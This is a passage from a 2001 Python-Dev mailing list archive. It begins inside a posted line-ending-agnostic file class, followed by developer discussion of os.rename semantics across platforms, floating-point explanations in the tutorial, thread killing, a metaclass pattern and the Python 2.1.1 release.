"native", "DOS", "Posix", "Unix", "Mac", or the characters themselves( "\r\n", etc. ). "native" will result in using the standard file object, which uses whatever is native for the system that python is running on. - LineBufferSize is the size of the buffer used to read data in a readline() operation. The default is currently set to 200 characters. If you will be reading files with many lines over 200 characters long, you should set this number to the largest expected line length. """ if "t" in flags: # this is a universal text file if ("w" in flags or "a" in flags) and LineEndingType == "native": return _OrigOpen(filename,flags.replace("t",""), bufsize) return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize) else: # this is a regular old file return _OrigOpen(filename,flags,bufsize) class UniversalTextFile: """ A class that acts just like a python file object, but has a mode that allows the reading of arbitrary formated text files, i.e. with either Unix, DOS or Mac line endings. [\n , \r\n, or \r] To keep it truly universal, it checks for each of these line ending possibilities at every line, so it should work on a file with mixed endings as well. """ def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""): self._file = _OrigOpen(filename,flags.replace("t","")+"b") LineEndingType = LineEndingType.lower() if LineEndingType == "native": self.LineSep = os.linesep() elif LineEndingType == "dos": self.LineSep = "\r\n" elif LineEndingType == "posix" or LineEndingType == "unix" : self.LineSep = "\n" elif LineEndingType == "mac": self.LineSep = "\r" else: self.LineSep = LineEndingType ## some attributes self.closed = 0 self.mode = flags self.softspace = 0 if LineBufferSize: self._BufferSize = LineBufferSize else: self._BufferSize = 100 def readline(self): start_pos = self._file.tell() ##print "Current file posistion is:", start_pos line = "" TotalBytes = 0 Buffer = self._file.read(self._BufferSize) while Buffer: ##print "Buffer = ",repr(Buffer) newline_pos = Buffer.find("\n") return_pos = Buffer.find("\r") if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line line = Buffer[:return_pos]+ "\n" TotalBytes = newline_pos+1 break elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line line = Buffer[:return_pos]+ "\n" TotalBytes = return_pos+1 break elif newline_pos >= 0: # we have a Posix line line = Buffer[:newline_pos]+ "\n" TotalBytes = newline_pos+1 break else: # we need a larger buffer NewBuffer = self._file.read(self._BufferSize) if NewBuffer: Buffer = Buffer + NewBuffer else: # we are at the end of the file, without a line ending. self._file.seek(start_pos + len(Buffer)) return Buffer self._file.seek(start_pos + TotalBytes) return line def readlines(self,sizehint = None): """ readlines acts like the regular readlines, except that it understands any of the standard text file line endings ("\r\n", "\n", "\r"). If sizehint is used, it will read a a mximum of that many bytes. It will not round up, as the regular readline does. This means that if your buffer size is less thatn the length of the next line, you won't get anything. """ if sizehint: Data = self._file.read(sizehint) else: Data = self._file.read() if len(Data) == sizehint: #print "The buffer is full" FullBuffer = 1 else: FullBuffer = 0 Data = Data.replace("\r\n","\n").replace("\r","\n") Lines = [line + "\n" for line in Data.split('\n')] #print Lines ## If the last line is only a linefeed it is an extra line if Lines[-1] == "\n": del Lines[-1] ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on. else: ## or it's the end of the buffer if FullBuffer: #print "the file is at:",self._file.tell() #print "the last line has length:",len(Lines[-1]) self._file.seek(-(len(Lines[-1])-1),1) # reset the file position del(Lines[-1]) else: Lines[-1] = Lines[-1][:-1] return Lines def readnumlines(self,NumLines = 1): """ readnumlines is an extension to the standard file object. It returns a list containing the number of lines that are requested. I have found this to be very usefull, and allows me to avoid the many loops like: lines = [] for i in range(N): lines.append(file.readline()) Also, If I ever get around to writing this in C, it will provide a speed improvement. """ Lines = [] while len(Lines) < NumLines: Lines.append(self.readline()) return Lines def read(self,size = None): """ read acts like the regular read, except that it tranlates any of the standard text file line endings ("\r\n", "\n", "\r") into a "\n" If size is used, it will read a maximum of that many bytes, before translation. This means that if the line endings have more than one character, the size returned will be smaller. This could gbe patched, but it didn't seem worth it. If you want that much control, use a binary file. """ if size: Data = self._file.read(size) else: Data = self._file.read() return Data.replace("\r\n","\n").replace("\r","\n") def write(self,string): """ write is just like the regular one, except that it uses the line separator specified when the file was opened for writing or appending. """ self._file.write(string.replace("\n",self.LineSep)) def writelines(self,list): for line in list: self.write(line) # The rest of the standard file methods mapped def close(self): self._file.close() self.closed = 1 def flush(self): self._file.flush() def fileno(self): return self._file.fileno() def seek(self,offset,whence = 0): self._file.seek(offset,whence) def tell(self): return self._file.tell() --------------B9643430766B782E71A5BE98-- From guido@digicool.com Wed May 23 00:46:53 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:46:53 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT." <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com> > It was brought to my attention a week ago by a client that os.rename > semantics differ between Unix and Windows. On Unix, if the destination file > already exists it is silently deleted. On Windows, an exception is raised. > I was able to verify this for Python 2.0 on Windows98. I assume nothing > changed for 2.1, but I can't verify that. I've always known this, and assumed it was common knowledge. Sorry. ;-) > (Windows trashed my partition > table and my Linux root partition while I was downloading 2.1. > Consequently, I no longer run Windows. Take that, Bill...) I haven't > checked the Mac yet (will do that when I get back to the US), but I think > that os.rename should have the same semantics across all platforms. To the > extent reasonably possible, I think this should also be true of other common > functions exposed through the os module. > > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were > implemented in the Windows version. It appears that is what POSIX > compliance would demand as well. > > Skip I certainly wouldn't want to try to emulate the Windows semantics on Unix. However, I think that emulating the correct Posix semantics on Windows is not possible either. The Posix rename() call guarantees that it is atomic: there is no point in time where the file doesn't exist at all (and a system or program crash can't delete the file). I wouldn't know how to do that in Windows -- the straightforward version if os.path.exists(target): os.unlink(target) os.rename(source, target) leaves a vulnerability open where the target doesn't exist and if at that point the system crashes or the program is killed, you lose the target. I would prefer to document the difference so applications can decide how to deal with this. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 23 00:50:29 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:50:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT." References: Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com> > Who was it that said every equation will halve your audience? Einstein. > I agree with that, the tutorial should try to be as broad and simple > as possible. But keep in mind that the particular Python tutorial we're talking about is intended for an audience of folks who already know how to program. I vote against dumbing this down. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel@digicool.com Wed May 23 01:17:59 2001 From: michel@digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 17:17:59 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com> Message-ID: On Tue, 22 May 2001, Guido van Rossum wrote: > > I agree with that, the tutorial should try to be as broad and simple > > as possible. > > But keep in mind that the particular Python tutorial we're talking > about is intended for an audience of folks who already know how to > program. I vote against dumbing this down. Now that I've actually read the tutorial (wink) I see the true target audience. For some reason, I thought it was oriented more toward the CP4E audience. Is there a python "children's book" complete with big red dogs and rabbits in waistcoats? That would be an interesting project... -Michel From guido@digicool.com Wed May 23 01:20:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 20:20:25 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT." References: Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com> > Is there a python "children's book" complete with big red dogs and rabbits > in waistcoats? That would be an interesting project... See http://www.python.org/sigs/edu-sig/ and http://www.python.org/doc/Intros.html (the latter has a section with intros for non-programmers). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Wed May 23 01:23:42 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 22 May 2001 20:23:42 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: I struggled with a way to do a better job of explaining this stuff last night. As I see others already said, the Tutorial is not aimed at script kiddies, or non-programmers, or even programming newbies, but at programmers who are simply new to Python. So everything I put in the tutorial was either jarringly out of place, or inadequate to address the audience you (Michel) have in mind. But I agree that's an important audience, and I spend a fair chunk of my life now anyway eexplaining this stuff over & over to those who think computing a ratio of two integers is akin to solving fourth order differential equations . In the end I decided to write a Tutorial Appendix in a much gentler style. It doesn't really fit with the rest of the Tutorial, but then that's *why* it's an Appendix. The patch is here: http://sourceforge.net/tracker/index.php?func=detail& aid=426208&group_id=5470&atid=305470 I also changed the tutorial fp examples so they have an excellent chance of displaying the same strings across all platforms, and even if Python 10K defaults to decimal floating-point someday (perhaps in the year 10000, as its name suggests). From gward@python.net Wed May 23 01:33:11 2001 From: gward@python.net (Greg Ward) Date: Tue, 22 May 2001 20:33:11 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400 References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <20010522203311.E1245@gerg.ca> On 22 May 2001, Guido van Rossum said: > I would prefer to document the difference so applications can decide > how to deal with this. I agree -- it has always seemed to me that the standard library merely exposes the underlying OS functionality for you. This puts portability somewhat in the hands of the application writer -- with power comes responsibility. I think that's the way it should be; any attempt to convert OS A to the semantics of OS B will fall down somewhere. Witness the loss-of-atomicity in Guido's example. I'm sure any other semantic difference between OSes would have similar "gotchas" if we attempted to paper over them. Greg -- Greg Ward - just another Python hacker gward@python.net http://starship.python.net/~gward/ Beware of altruism. It is based on self-deception, the root of all evil. From tim.one@home.com Wed May 23 07:31:29 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 02:31:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <20010522094157.A1245@gerg.ca> Message-ID: [Greg Ward, on http://www.lahey.com/float.htm] > I found this article more useful, interesting, and informative than > whatever I learned about binary floating-point in my academic years. > Good link, Tim. Two catches: > > * I can just barely follow the FORTRAN examples; I very much doubt > the average Python newbie would have any more luck than me The goal is to frighten them: the ones with the right stuff to use fp without destroying a satellite, bringing down the Internet, designing a pacemaker that fails when rounding a corner clockwise at 1.37g, causing a small country's economy to collapse, making jet fighters spontaneously turn upside down when crossing the equator, or triggering WW III by accident, will persist . BTW, not all of those were made up! > * I tried several of the FORTRAN examples in Python, and did not > witness any of the gotchas they are meant to illustrate. Possibly > it's just single-precision vs. double-precision difference, but > Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 > doesn't demonstrate the same gotchas as that article does. You can't illustrate the last half of their examples in Python without playing obscure games with the struct module, because they rely on the existence of more than one size of floating-point type. Your lack of luck with the first half of their examples is indeed solely due to that he used single-precision examples and Python's float is double. You need to find different numbers to show the same things in Python; like so: # Binary Floating Point x = 100000000000. * 0.00000000001 if x != 1.0: print "Oops! It's %r" % x # Inexactness a = 98. / 49. reciprocal = 1./49. b = 98. * reciprocal if a != b: print "Oops! They're %r and %r" % (a, b) # Crazy Conversions x = 32.05 y = x * 100. # "looks like" 3205. if display rounded i = int(y) # actually truncates to 3204 print y, i, repr(y) It's Real Work coming up with stuff like that. What I'm hearing is that people won't understand it anyway -- so screw it. If they want an education, they can prove it by doing a google search <0.6 wink>. From tim.one@home.com Wed May 23 07:44:14 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 02:44:14 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: [Guido] > ... > I certainly wouldn't want to try to emulate the Windows semantics on > Unix. However, I think that emulating the correct Posix semantics on > Windows is not possible either. Neither is it desirable: Windows isn't POSIX, and Windows users would be appalled if os.rename() could silently destroy files. If such a function needs to exist, create a new cowboy_unix_tricks module instead . This has never been a problem for me because I always check to see whether the target file exists before using os.rename(), and do something else if it does. I understand that's vulnerable to races, but nobody asked whether I cared about that . > The Posix rename() call guarantees that it is atomic: there is no > point in time where the file doesn't exist at all (and a system or > program crash can't delete the file). I wouldn't know how to do > that in Windows -- the straightforward version > > if os.path.exists(target): > os.unlink(target) > os.rename(source, target) > > leaves a vulnerability open where the target doesn't exist and if at > that point the system crashes or the program is killed, you lose the > target. More obvious, it also fails if target simply exists and is open (you can't unlink an open file on Windows). Nevertheless, you can do this renaming safely on Windows, via doing the right system magic to make rename happen at reboot time before Windows actually starts. But I'm not sure Skip's client would want to reboot each time Python did a file rename . > I would prefer to document the difference so applications can decide > how to deal with this. Yup! From MarkH@ActiveState.com Wed May 23 09:55:17 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Wed, 23 May 2001 18:55:17 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Tim on a subject near and dear to his testicles] > It's Real Work coming up with stuff like that. What I'm hearing is that > people won't understand it anyway -- so screw it. If they want > an education, > they can prove it by doing a google search <0.6 wink>. I am inclined to agree. IMO, The Python tutorial or other documentation should include a basic example of these "errors", and a link to _either_ of the HTML pages referenced in this thread as an optional extra. Just enough to stop _most_ of the "this is a bug" posts - but stopping well short of any attempt to "educate" them in floating point madness. Just _one_ example of floats not being exact would suffice. Going from my personal experience, I learnt long ago that floating point is not exact. That is all I needed to know to move on. I didn't like it, and I didn't understand exactly why (I thought I did, but Tim put a stop to that misconception ), but I could move on once I had that skerrick of enlightenment. And believe it or not, some of my code _does_ use floats, and _does_ work! (well, works as well as the rest of my code anyway ) And-it-wasn't-even-Python-that-taught-me, Mark. From pf@artcom-gmbh.de Wed May 23 08:49:13 2001 From: pf@artcom-gmbh.de (Peter Funk) Date: Wed, 23 May 2001 09:49:13 +0200 (MEST) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred L. Drake, Jr." at "May 22, 2001 06:04:11 pm" Message-ID: Hi, Fred L. Drake, Jr. schrieb: > skip@pobox.com writes: > > On the (unsupportable) theory that to-date, more Python apps have been > > written and/or deployed on Unix-like systems and that where Windows apps are > > concerned, many developers will have added a thin wrapper to mimic the Unix > > semantics, I think less breakage would result if the Unix semantics were > > I don't know whether there are more deployed Python apps on Unix > than on Windows (and I've no good idea about how to find out), but I > think unifying the semantics one way or the other is a good thing. > Regardless of which set of semantics is chosen. I agree. May I suggest to add an optional third boolean parameter to os.rename called 'replace', which defaults either to TRUE or FALSE, so modifying existing apps will become even less hassle to potential porters. Here is a strawman to explain what I mean: -------------------------------------- import os def new_rename(src, dst, replace=0, old_rename=os.rename): if os.path.exists(dst): if replace: if not os.path.isdir(dst): os.remove(dst) else: # I'm not sure what to do here. recursive removal? dangerous! raise NotImplementedError else: raise OSError("%s already exists" % dst) return old_rename(src, dst) os.rename = new_rename -------------------------------------- Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From jack@oratrix.nl Wed May 23 12:15:10 2001 From: jack@oratrix.nl (Jack Jansen) Date: Wed, 23 May 2001 13:15:10 +0200 Subject: [Python-Dev] Assertion failed in dictobject.c Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl> I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and interestingly hash is also 8. Going back to revision 2.90 fixes the problem (or masks it). -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From skip@pobox.com (Skip Montanaro) Wed May 23 12:59:45 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 23 May 2001 06:59:45 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <15115.42545.172775.716565@beluga.mojam.com> >>>>> "Tim" == Tim Peters writes: Tim> [Guido] >> I would prefer to document the difference so applications can decide >> how to deal with this. Tim> Yup! Submitted as patch #426598, assigned to Dr. Doc (aka Fred). Skip From skip@pobox.com (Skip Montanaro) Wed May 23 13:11:51 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 23 May 2001 07:11:51 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> Message-ID: <15115.43271.480135.227059@beluga.mojam.com> Peter> I agree. May I suggest to add an optional third boolean Peter> parameter to os.rename called 'replace', which defaults either to Peter> TRUE or FALSE, so modifying existing apps will become even less Peter> hassle to potential porters. In his response to my post, Guido indicated there is a race condition. Between the time you delete the preexisting destination file and do the actual file rename, Windows could wink out on you, leaving you with the original src file and no original dst file. POSIX semantics require the rename to be atomic. This is just not going to be possible. Fred, perhaps my doc mod should be enhanced to identify the race condition for people who need to use os.rename on Windows and will be forced to first unlink the destination file. Skip From guido@digicool.com Wed May 23 14:19:24 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:19:24 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT." References: Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com> I liked the text that Tim posted to SF, but I would like it even better if it also *contained* the text from the "PresentationError" moinmoin wiki page, rather than referring to it by URL. The moinmoin URL is not a good long-term name for that information -- printed copies of the tutorial will persist long after the moinmoin wiki has been moved or consolidated. Plus, instead of referring people to the moinmoin wiki page, I'd like to be able to refer them to the appendix of the tutorial! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 23 14:32:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:32:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000." References: Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com> [Mark] > IMO, The Python tutorial or other documentation should include a basic > example of these "errors", and a link to _either_ of the HTML pages > referenced in this thread as an optional extra. > > Just enough to stop _most_ of the "this is a bug" posts - but > stopping well short of any attempt to "educate" them in floating > point madness. Just _one_ example of floats not being exact would > suffice. I agree: we don't have to explain *why* it happens. We just have to explain *that* it happens, so so folks don't think they've discovered a bug in Python. Or maybe we could do this: in the main text, explain and show *that* it happens, and refer to the appendix which can explain *why* it happens to those interested, in a gentle manner like what Tim already wrote. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 23 14:52:02 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:52:02 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200." References: Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com> > May I suggest to add an optional third boolean parameter to > os.rename called 'replace', which defaults either to TRUE or FALSE, > so modifying existing apps will become even less hassle to potential > porters. I see no reason to change the API. In any case, for backwards compatibility, the default would have to be platform dependent, which strikes me as just as bad as the current situation. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas@xs4all.net Wed May 23 15:00:25 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 16:00:25 +0200 Subject: [Python-Dev] Python 2.1.1 Message-ID: <20010523160025.B690@xs4all.nl> As those of you on python-checkins might have noticed ;) I started checking in Python 2.1.1 bufixes. I'd hoped to finish all of my backlog today, but unfortuantely I'm now called away on a suprise emergency meeting, so I'm not sure if I'll make it. The 2.1.1 tree is sort of an unstable state right now, I'll fix that today in any case, but after the meeting. (As for why I started doing it: I just spent about two weeks of digging through Pine sourcecode, and its imap server in particular, and I decided I deserved a break -- Python reads like a Heinlein novel, after pine code: readable, straight-forward, and just enough complexity to keep it entertaining :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From aahz@rahul.net Wed May 23 15:08:45 2001 From: aahz@rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 07:08:45 -0700 (PDT) Subject: [Python-Dev] Killing threads Message-ID: <20010523140845.B092299C83@waltz.rahul.net> Okay, so we all know it isn't possible to kill threads cleanly and safely in any kind of cross-platform way. At the same time, a program that has a thread running haywire should be able to kill itself completely, so that a monitoring process can restart it. How hard would it be to do only that in a cross-platform way? I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No clue what would need to happen for Windows and Mac. (This got brought up because I experimented with os._exit() as a possible solution, but that GPFs on Win98SE.) -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From thomas.heller@ion-tof.com Wed May 23 18:28:07 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 19:28:07 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> [this message has also been posted to comp.lang.python] Guido's metaclass hook in Python goes this way: If a base class (let's better call it a 'base object') has a __class__ attribute, this is called to create the new class. >From demo/metaclasses/index.html: class C(B): a = 1 b = 2 Assuming B has a __class__ attribute, this translates into: C = B.__class__('C', (B,), {'a': 1, 'b': 2}) Usually B is an instance of a normal class. So the above code will create an instance of B, call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, and assign the instance of B to the variable C. I've ever since played with this metaclass hook, and always found the problem that B would have to completely simulate the normal python behaviour for classes (modifying of course what you want to change). The problem is that there are a lot of successful and unsucessful attribute lookups, which require a lot of overhead when implemented in Python: So the result is very slow (too slow to be usable in some cases). ------ Python 2.1 allows to attach attributes to function objects, so a new metaclass pattern can be implemented. The idea is to let B be a function having a __class__ attribute (which does _not_ have to be a class, it can again be a function). What is the improvement? Classes, when called, create new instances of themselves, functions can return whatever they want. I've used this pattern to realize the ideas Costas Menico described in an article 'Simulating class' in c.l.p, and James Althoff improved in a followup. The proposal was to create class methods the following way: <--- start of code ---> class Class1MetaClass: # Base for metaclass # Define "class methods" for Class1 def whoami(self): print 'Class1MetaClass.whoami:', self # define Class1 & its "instance methods" class Class1: # Base class def whoami(self): print 'Class1.whoami:', self Class1Meta = Class1MetaClass() # Make & name the singleton metaclass instance Class1 = Class1Meta.Class1 # Make the Class1 name accessible # define subclasses: class Class2MetaClass(Class1MetaClass): [rest of code omitted] # use them: Class1Meta.whoami() # invoke "class method" of base class Class1().whoami() # make an instance & invoke "instance method" i = Class1Meta() # make another instance... i.whoami() # ...invoke "instance method" <--- end of code ---> I find this idea very interesting, but you have to be very verbose: Define a Class1MetaClass, create an instance to use as the metaclass, remeber to use Class1MetaClass (and not! Class2Meta) to define subclasses. ------ I would like (and have implemented) the following way to create class methods. You have to supply the magic MetaMixin object as the first object in the base class list. class SpamClass(MetaMixin): # define "class methods" def whoami(self): print "SpamClass.whoami:", self def create(self, arg1, arg2): # a factory class method return self._instance(arg1, arg2) class _instance_: # define "instance methods" def whoami(self): print "instance.whoami:", self # Subclassing goes this way: class FooClass(MetaMixin, SpamClass): def create(self, arg1, arg2): # override the factory method return self._instance_(arg2, arg1) class _instance_(SpamClass._instance_): # define "instance methods" def blah(self): print "blah:", self self.whoami() # Test them: print SpamClass #prints: SpamClass.whoami() #prints: SpamClass.whoami: s = SpamClass() print s #prints: <__main__.SpamClass_Instance instance at 007C0DAC> s.whoami() #prints: instance.whoami: <__main__.SpamClass_Instance instance at 007C0DAC> ------ Here is finally the code for MetaMixin: <--- start code ---> def MagicObject(name, bases, dict): import types, new l = [] for b in bases: if type(b) == types.FunctionType: # we will see our MetaMixin function here, # but this cannot be used in bases continue if type(b) == types.InstanceType: # l.append(b.__class__) else: l.append(b) bases = tuple(l) # define a new class Class = new.classobj(name, bases, dict) # create an instance of this class # without calling it's __init__ method class_instance = new.instance(Class, {}) # new protocol for initializing try: class_instance.__init_class__ except: pass else: class_instance.__init_class__() Instance = new.classobj("%s_Instance" % name, \ Class._instance_.__bases__, \ Class._instance_.__dict__) Instance.__dict__['__meta__'] = class_instance Class._instance_ = Instance return class_instance def MetaMixin(): pass MetaMixin.__class__ = MagicObject <--- end code ---> Comments? Thomas From guido@digicool.com Wed May 23 19:02:06 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 14:02:06 -0400 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200." <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> Message-ID: <200105231802.f4NI26408784@odiug.digicool.com> > [this message has also been posted to comp.lang.python] [And I'm cc'ing there] > Guido's metaclass hook in Python goes this way: > > If a base class (let's better call it a 'base object') > has a __class__ attribute, this is called to create the > new class. > > >From demo/metaclasses/index.html: > > class C(B): > a = 1 > b = 2 > > Assuming B has a __class__ attribute, this translates into: > > C = B.__class__('C', (B,), {'a': 1, 'b': 2}) Yes. > Usually B is an instance of a normal class. No, B should behave like a class, which makes it an instance of a metaclass. > So the above code will create an instance of B, > call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, > and assign the instance of B to the variable C. No, it will not create an instance of B. It will create an instance of B.__class__, which is a subclass of B. The difference between subclassing and instantiation is confusing, but crucial, when talking about metaclasses! See the ASCII art in my classic post to the types-sig: http://mail.python.org/pipermail/types-sig/1998-November/000084.html > I've ever since played with this metaclass hook, and > always found the problem that B would have to completely > simulate the normal python behaviour for classes (modifying > of course what you want to change). > > The problem is that there are a lot of successful and > unsucessful attribute lookups, which require a lot > of overhead when implemented in Python: So the result > is very slow (too slow to be usable in some cases). Yes. You should be able to subclass an existing metaclass! Fortunately, in the descr-branch code in CVS, this is possible. I haven't explored it much yet, but it should be possible to do things like: Integer = type(0) Class = Integer.__class__ # same as type(Integer) class MyClass(Class): ... MyObject = MyClass("MyObject", (), {}) myInstance = MyObject() Here MyClass declares a metaclass, and MyObject is a regular class that uses MyClass for its metaclass. Then, myInstance is an instance of MyObject. See the end of PEP 252 for info on getting the descr-branch code (http://python.sourceforge.net/peps/pep-0252.html). > ------ > > Python 2.1 allows to attach attributes to function objects, > so a new metaclass pattern can be implemented. > > The idea is to let B be a function having a __class__ attribute > (which does _not_ have to be a class, it can again be a function). Oh, yuck. I suppose this is fine if you want to experiment with metaclasses in 2.1, but please consider using the descr-branch code instead so you can see what 2.2 will be like! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 23 19:40:58 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 23 May 2001 20:40:58 +0200 Subject: [Python-Dev] Daily Python URL on your Palm Message-ID: <3B0C043A.D5C9C604@lemburg.com> Just thought you might want to know that Fredrik's Daily Python URL can be downloaded onto the Palm as Avantgo Channel. Here's the URL for adding the channel: http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00 PS: Would be nice if Fredrik could provide a "printable" version of the Daily URL page, since the table layout doesn't work too well on the small Palm display. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 23 19:57:28 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 20:57:28 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> <200105231802.f4NI26408784@odiug.digicool.com> Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook> Let me try again (and please forgive my mistakes in the detail). The usual way (as in demo\metaclasses): class B_Meta: .... B = B_Meta('B', (), {}) class C(B): pass B is an instance of the (meta)class B_Meta. C is now another instance of the same (meta)class. because B.__class__, which is the (meta)class itself, is called, and returns a new instance. B_Meta can (and must) implement a lot of behaviour. In contrast, with my recipe: def MagicFunction(name, bases, dict): ...construct a class on the fly... ...create an instance of this class... return aninstance_of_a_class def B_Meta(): pass B_Meta.__class__ = MagicFunction class C(B): pass Now C is an_instance_of_a_class (which is an instance of a normal python class), and thus does inherit the normal behaviour of Python classes. Thomas PS: I'm sure this all will be much better in descr-branch. I've checked it out and am playing with it from time to time, but most of the time I have to use released Python versions. From tim.one@home.com Wed May 23 20:32:59 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 15:32:59 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523160025.B690@xs4all.nl> Message-ID: [Thomas Wouters] > > As those of you on python-checkins might have noticed ;) I started > checking in Python 2.1.1 bufixes. And bless you for it, Thomas! > I'd hoped to finish all of my backlog today, but unfortuantely I'm > now called away on a suprise emergency meeting, Now that sucks. Tell your manager that you'll only attend planned emergency meetings from now on: Guido plans Python crises years in advance, and it shows in the relative cleanliness of the Python codebase . From nas@python.ca Wed May 23 20:41:14 2001 From: nas@python.ca (Neil Schemenauer) Date: Wed, 23 May 2001 12:41:14 -0700 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400 References: <20010523160025.B690@xs4all.nl> Message-ID: 